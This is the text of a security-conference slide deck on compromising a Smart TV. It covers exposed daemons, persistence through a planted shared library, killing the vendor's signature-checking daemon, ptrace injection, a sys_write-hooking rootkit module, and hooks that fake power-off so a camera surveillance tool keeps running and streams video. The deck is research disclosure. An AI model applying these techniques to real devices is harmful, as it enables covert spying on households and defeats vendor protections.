A hacker outside of your network
Traditional vectors are also possible
Web browser
It’s hard to patch security flaws for
embedded systems
The browser uses webkit and flash
They’re old versions
48. 48
A hacker in your network
Network daemons
There are around 10 tcp/udp daemons
They are not ftp/sendmail/ssh
But for providing rich experiences to user
tcp 0 0.0.0.0:58336 0.0.0.0:* LISTEN 847/MainServer
Tcp 0 0.0.0.0:64384 0.0.0.0:* LISTEN 847/MainServer
tcp 0 0.0.0.0:57794 0.0.0.0:* LISTEN 847/MainServer
tcp 0 0.0.0.0:9090 0.0.0.0:* LISTEN 67/exeDSP
tcp 0 0.0.0.0:50887 0.0.0.0:* LISTEN 847/MainServer
tcp 0 0.0.0.0:51916 0.0.0.0:* LISTEN 847/MainServer
tcp 0 0.0.0.0:80 0.0.0.0:* LISTEN 67/exeDSP
tcp 0 0.0.0.0:6000 0.0.0.0:* LISTEN 471/X
tcp 0.0.0.0.0:55000 0.0.0.0:* LISTEN 67/exeDSP
tcp 0 0.0.0.0:55001 0.0.0.0:* LISTEN 67/exeDSP
tcp 0 0.0.0.0:62778 0.0.0.0:* LISTEN 847/MainServer
tcp 0 0.0.0.0:4443 0.0.0.0:* LISTEN 67/exeDSP
tcp 0 0.0.0.0:443 0.0.0.0:* LISTEN 67/exeDSP
tcp 10.0.1.23:7676 0.0.0.0:* LISTEN 67/exeDSP
49. 49
A hacker in your network
The 55000 looks interesting
It has interesting functions
CTVControlManager::PacketParsing()
parses our packet
Around 20 commands in switch()
0, 1, 2, 4, 6, 7, 8, 9, 11, 12, 17, 18, 19, 20, 20,
100(auth and provide rich features to client),
110(bluetooth pairing), 120(Get public key),
121(rsa decrypt), 130(send key after aes
decrypt), 200
Only a few commands need authentication
50. 50
A hacker in your network
There are some spots of memory corruption
in commands that do some crypto
They don’t properly check user value
It’s exploitable but references
uncontrollable data by us
We seldom see PC points to unmapped
address, but have not done with a way
make it reliable yet (lame)
Pid: 3465, comm: RemoteClient CPU: 0 Tainted: P (2.6.35.13 #1)
pc : [<01bb36d4>] lr : [<036ca950>] psr: a0000010sp : 8f339bc0
ip : 8f33ccd4 fp : 8f339bfcr10: 8f33ac60 r9 : 8f33cce4 r8 : 00000000
r7 : 8f33ac60 r6 : 8f340450 r5 : 066e91e8 r4 : 0788eb98 r3 : 00000000
r2 : 06d97380 r1 : 00000000 r0 : 00000000
51. 51
A hacker in your network
Port 7676 is UPNP service looks interesting
It has around 6 services
2 services need you authenticated
4 services don’t’ need you authentication
But didn’t find any bug yet
Man in The Middle
We said, all apps are running as ‘root’
If there is anything wrong handling during
MiTM, it’s pwned
For example, while update apps
We found some at updating code
And there are packets not encrypted even
for credentials
52. 52
A hacker who can be around
Who can touch your TV
Physical attacks
USB, other ports, etc
The TV is Linux version 2.6.35
Who can see your TV
Remote controller
Tried to find memory corruption bugs in the
code that parses your remote signals
#fail
Who can be around your home
Broadcast signals
But unfortunately, we’ve not done anything
with this yet
53. 53
What do you do in pwned TV?
Basically, you can do everything
As it’s just a regular PC
Bad guys would do
Hijacking TV programs
Key-logging
Capturing TV screenshot
Sniffing network traffic
Stealing financial information
54. 54
Persistent shells from TV
We need shells from rebooted TV
There are 3 general ways for that
1: Re-writing firmware
Like Smart TV updates itself
But this could make TV a brick
2: Remounting to make partitions writable
and writing something bad into files
Example) /etc/init.rc
But “mount -o rw” sometimes doesn’t work in
embedded platforms for some reason
3: Finding some .so files loaded by programs
in a writable partition
We take this way
55. 55
Persistent shells from TV
Finding some so files loaded by programs in
a writable partition
This can be achieved easily
Hooking sys_open() and checking if there
is any “No such file or directory” .so file
We find some files
The files are loaded by web browser launcher
And the launcher is executed when booting
void _init() {
system(do_some_bad);
}
56. 56
Persistent shells from TV
But there is a User Executable Preventer
service daemon by the vendor
It checks files and removes if they’re not
signed by the vendor
[User Executable Preventer daemon]
void check() {
while(1) {
file = find_next_file();
ret = CheckRSA(file);
if(ret == NOT_SIGNED) {
remove(file);
}
sleep(some);
}
}
57. 57
Persistent shells from TV
Solution: Just kill the daemon
Now not signed programs can be alive
Note: The PREVENTER is not a good idea. It
doesn’t actually prevent, but, just gives bad
performance to TV
[OUR KILLER]
main() {
while(1) {
system(“killall -9 PREVENTER”);
sleep(5);
}
}
58. 58
What does beist do in pwned TV?
We asked around 100 friends what case is
the worst if their Smart TV got hacked
1: Stealing financial information
2: Hijacking TV programs
3: Breaking your TV
4: Watching and listening via your TV
Vote, please?
i0n1c: “of course, 3”
jduck: “no, it’s 1”
dragos: “stupid, 4”
59. 59
What does beist do in pwned TV?
SURVEY RESULT
We asked friends around 100 what’s the worst
case people think if their Smart TV got hacked
1: Stealing financial information
10%
2: Hijacking TV programs
0%
3: Breaking your TV
5%
4: Watching and listening via your TV
85%
60. 60
What does 85% mean?
85% is still very high
But I think the 15% didn’t exactly
understand what I can do in pwned TV
Most of them are not computer experts
61. 61
Privacy!
We know that Smart TV have built-in
camera and mic
Sounds so fun
But before we cover “Surveillance
implementation part” of pwned Smart TV,
I need to mention
Surveillance program
Smart phone against Smart TV
As a view of bad guys
62. 62
Surveillance on Smartphone
Smartphone
Smartphone has camera and MIC
But have you ever captured photos using
the camera 24/7?
“I did the test”
I ran a simple surveillance program in an
android Smartphone
It took a photo every 1 minuet
I went out with it and used like my real phone
I got 2 problems while the test
63. 63
Surveillance on Smartphone
Smartphone
Problem 1
After having hundreds of photos,
I checked those pictures
Only around 1% photos were “just ok”
More than 99% photos were useless
You can easily guess why
You usually put your phone in your pocket or
on the desk
Or moving so fast, then it’s so blur
64. 64
Surveillance on Smartphone
Smartphone
Problem 2
I don’t take photos much using my phone
But after this test, I realized taking
pictures drains power
If you run your surveillance program in a
target’s phone, he’ll recognize it quickly
as his phone will be dying before lunch
65. 65
Surveillance on Smart TV
Smart TV
There is no power problem
TV is almost always connected to the power
Even no problem with 24 hour recording
TV can’t move
But on the other hand, it’s a good
photographer
Surveillance on TV is not only about you
However, it’s also about your family or people
who you very love
Do not make TV see your bed
66. 66
Surveillance on Smart TV
Smart TV
TV can’t go to your office
It may not steal your business
information or secret conversation
Unless if you put Smart TV at office
But we hear Smart TV is getting used more
and more in corporate environments
But things that bad guys can get from
pwned Smart TV would be very personal
privacies
And it’s so terrible, obviously
67. 67
We need debugging
Debugging is necessary as most of code are
written in C++
There are many binaries but a binary is very
huge over 100mb and it is the core program
Even ported GDB was not convenient
Many hangs which we didn’t figure yet
Wanted to have a more comfortable tool to use
@collinrm Collin Mulliner’s android DBI
http://www.mulliner.org/android/
http://www.mulliner.org/android/feed/colli
n_android_dbi_v02.zip
68. 68
Collin’s DBI for Android
How Collin’s DBI for Android works
It ptrace() a target process and changes PC,
then executes a shellcode that does dlopen()
The dlopen() shellcode is in stack
Call mprotect() to make it executable
The shellcode patches our target function
hijack.c: inject libt.so into the target process
using ptrace()
libt.c: inline hooking in the target function
It works great after modifying a bit for TV
69. 69
Sample hooking code
// TCTv::Power(int, TCTv::EBootReason, bool)
#define ADDR 0x00E5CBC4
void _init() {
printf("libt.so loaded...n");
fflush(stdout);
// TCTv::Power(int, TCTv::EBootReason, bool)
addr = (void *)(((int)ADDR) & ~(4096-1));
mprotect((char *)addr, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);
hook(&hook_info, ADDR, hooked_func);
}
void (*orig_my_func) (int a, int b, int c);
void hooked_func(int a, int b, int c) {
printf("hooked!n");
fflush(stdout);
orig_my_func = (void*) hook_info.orig;
hook_precall(&hook_info);
orig_my_func(a, b, c);
hook_postcall(&hook_info);
}
70. 70
Debugging to trace C++ stacks
C++ is hard to know who is calling and who
is called, we mainly used DBI to trace it
easily. Argument value is bonus.
asm ("mov %0, %%r0n" :"=r"(r0));
asm ("mov %0, %%r1n" :"=r"(r1));
asm ("mov %0, %%r2n" :"=r"(r2));
asm ("mov %0, %%r3n" :"=r"(r3));
asm ("mov %0, %%lrn" :"=r"(lr));
asm ("mov %0, %%pcn" :"=r"(pc));
printf("=== Dump Registers ===n");
printf("r0 = %pn", r0);
printf("r1 = %pn", r1);
printf("r2 = %pn", r2);
printf("r3 = %pn", r3);
printf("lr = %pn", lr);
printf("pc = %pn", pc);
p = (int *)r0;
printf("this pointer : %pn", p);
vftable = (int *)*p;
printf("vftable : %xn", vftable);
71. 71
Watch the log
Our target is a background process
We can’t see printf() messages
So, we made a simple Linux kernel module
for hooking sys_write()
/tmp/message.log
asmlinkage ssize_t hooked_sys_write(int fd, char* buf, size_t count)
{
...
sprintf(str, "[rootkit] Message from %s (%d)nn", c
urrent->comm, current->pid);
write_to_file("/tmp/message.log", str, strlen(str));
return org_sys_write(fd, buf, count);
...
}
72. 72
Guide by the dev: Debug messages in binaries
The developers leave a lot of debug
messages that can be very useful for us
--- SCAN CODE=[%d] vs Converted CODE=[%d]
TYPE=[%ld], CODE=[%d]
***** kbd=[0x%lx] VS m_keyboard=[0x%lx]
*****
Unfortunately, global variables made for
release version don’t help us
...
if (dword_690E4C8 <= some_value ) {
if ( some_value <= dword_690E4D0 ) {
printf("SOME_VERY_USEFUL_DEBUG_MSG");
}
}
...
73. 73
To get hints from developers
But, we can change the global values by
runtime patch and see those useful
messages
Then, it’s going to be more easier
ptrace(PTRACE_ATTACH, pid, 0, 0);
ptrace(PTRACE_POKEDATA, pid, 0x690E4C8, 0x00000000); // DEBUG_LOW_ADDRESS
ptrace(PTRACE_POKEDATA, pid, 0x690E4D0, 0x00003030); // DEBUG_HIGH_ADDRESS
ptrace(PTRACE_DETACH, pid, 0, 0);
74. 74
Does your rootkit work 24/7?
My father always tells me
Father: “Turn off TV before you go out.”
Me: “But, my rootkit is running inside!”
As Smart TV is like a regular PC, when users
turn off TV, every program is down
It’s time to show a clever trick
If we can
#1984 and 24-hour surveillance
75. 75
Korean hackers work for 24/7
Our surveillance program should work for
24/7 even when users turn-off TV
For the record:
We didn’t really want to make this, but, the
company said to media
“By bad guys, taking pictures might be
possible in TV, but, when users turn off TV,
it’s impossible.”
But Smart TV is just like a regular PC, we
should be able to do everything if we
already pwn it.
76. 76
How? Reversing and hacking
First, we should find functions that do turn-
on and turn-off
TCTv::Power()
When TV is on and user press “power
button”, TV does
Off screen
Off sound
Off some processes
Not kernel
And reach to TCTv::Power() to actually
turn off
77. 77
Trick for 24/7
So, we put a tiny hook code in prologue of
TCTv::Power()
Just “return”
Then, it seems TV is off except this LED
78. 78
Trick for 24/7
To turn off the LED, we call
TDsSystem::SetLightEffect() with 0
Now, the TV looks turn-off!
But actually not
Our rookit is still working
We have to put another hook code at
TCTv::Power() again
if(second_condition)
TDsSystem::SetLightEffect() with 3
79. 79
Trick for 24/7
Later, user push “power button” again to turn
on the TV
It will reach to TCTv::Power() and
TDsSystem::SetLightEffect(3) will be called
To make the LED on
Then, we call TDsSystem::SetPower(0)
For “fast-reboot”, this takes only 1 sec
And TV screen, sound, processes go up
Since the fast-reboot, it’s rebooted and our
shell is disconnected
But we have persistence shells!
After a few minuets later, we’ll get a shell
80. 80
Trick for 24/7
By this way, users never realize if there is
something inside!
Rootkit!
So, we’ve done so far
Getting shells from the box
Cute tricks for debug messages
Patch and linux kernel module
Some debugging
Persistence shells
24/7 working
And.. Where is the surveillance?!
81. 81
The self surveillance program
We’ve implemented two surveillance tools
1: Taking pictures and sending them to
our server automatically
2: Video recording and live-watch it
remotely (Streaming!)
We will skip the first one as video is much
more fun and these slides are already too
many
So, how?
82. 82
How? Reversing again!
We have to understand how the TV records
We could use the device driver directly, but,
tried to know what functions are used for it
By tracing, we’ve analyzed we can be
reached there via..
87. 87
Thank you for the code, dev!
So, if we set arg1 + 0x1c to not 0, the
program saves the buffer into a file
Alright, we do this by patching again
int hooked_func(unsigned int a) {
unsigned int *p, value;
int (*my_func)(unsigned int b);
printf("hooked CMoIPVideoFeeder::StartRenderern");
value = *(int *)(a+28);
p = a+28;
*p = 1;
my_func = (void*) hook_info.orig;
hook_precall(&hook_info);
value = my_func(a);
hook_postcall(&hook_info);
return value;
}
88. 88
We have a video file, then?
We now have a video file
We could just send it to us and open it
But we made a streaming for show
Now.. Go for DEMO!
89. 89
Live streaming demo
Well, we’ve tested a lot but
I hope there are no demo gods here
Live Streaming
#Adult_Only
90. 90
Conclusion
Smart TV hacks probably doesn’t make money
like Smartphone hacks
But personal privacies are very important
And Smart TV is a perfect environment for
surveillance
Power is connected
Camera and voice sensors
Can be located at very privacy places
Almost no noise while running
It’s now getting used more and more in office
environments, Smart TV security should be
considered for security policy
91. 91
Thanks to
Mongii from hackerschool.org
Helped me a lot and got me inspired
Tora from google
Defend.the.world!
Donato from revuln.com
Tora and Donato gave me nice comments
Samygo forum
Lots of useful information
SAMSUNG and Secu-I in Korea
IAS Lab, CIST, Korea University
92. 92
Q & A
Thank you so much, CANSECWEST!
Thank you for attending
Contact me if you have any question
beist@grayhash.com
I’ll be working on Smart TV Security soon
for SAMSUNG, I hope to make it more
secure! Wish me a luck!
93. SeungJin Lee
E-mail : beist@grayhash.com
Twitter : @beist
Beist has been a member of the IT security field since 2000. His first company was Cyber Research
based in Seoul, South Korea and first focused on pen-testing. He then got a Computer Engineering
B.A. degree from Sejong University. He has won more than 10 global CTF hacking contests in his
country as well as passed DefCon quals 5 times. He has sold his research to major security
companies like iDefense and ZDI (Recon ZDI contest). He has run numerous security conferences
and hacking contests in Korea. Hunting bugs and exploiting them are his main interest. He does
consulting for big companies in Korea and is now a graduate student at CIST IAS LAB, Korea
University.
94. Seungjoo Kim (Corresponding Author)
E-mail : skim71@korea.ac.kr
Homepage : www.kimlab.net
Facebook, Twitter : @skim71
Prof. Seungjoo Kim received his B.S. (1994), M.S. (1996), and Ph.D. (1999) in information engineering
from Sungkyunkwan University (SKKU) in Korea. Prior to joining the faculty at Korea University (KU)
in 2011, He served as Assistant & Associate Professor of School of Information and Communication
Engineering at SKKU for 7 years. Before that, He served as Director of the Cryptographic Technology
Team and the (CC-based) IT Security Evaluation Team of the Korea Information Security Agency (KISA)
for 5 years. Now he is Full Professor of Graduate School of Information Security at KU, and a
member of KU's Center for Information Security Technologies (CIST). Also, He has served as an
executive committee member of Korean E-Government, and advisory committee members of several
public and private organizations such as National Intelligence Service of Korea, Digital Investigation
Advisory Committee of Supreme Prosecutors' Office, Ministry of Justice, The Bank of Korea,
ETRI(Electronic and Telecommunication Research Institute), and KISA, etc. His research interests
include cryptography, information security and information assurance.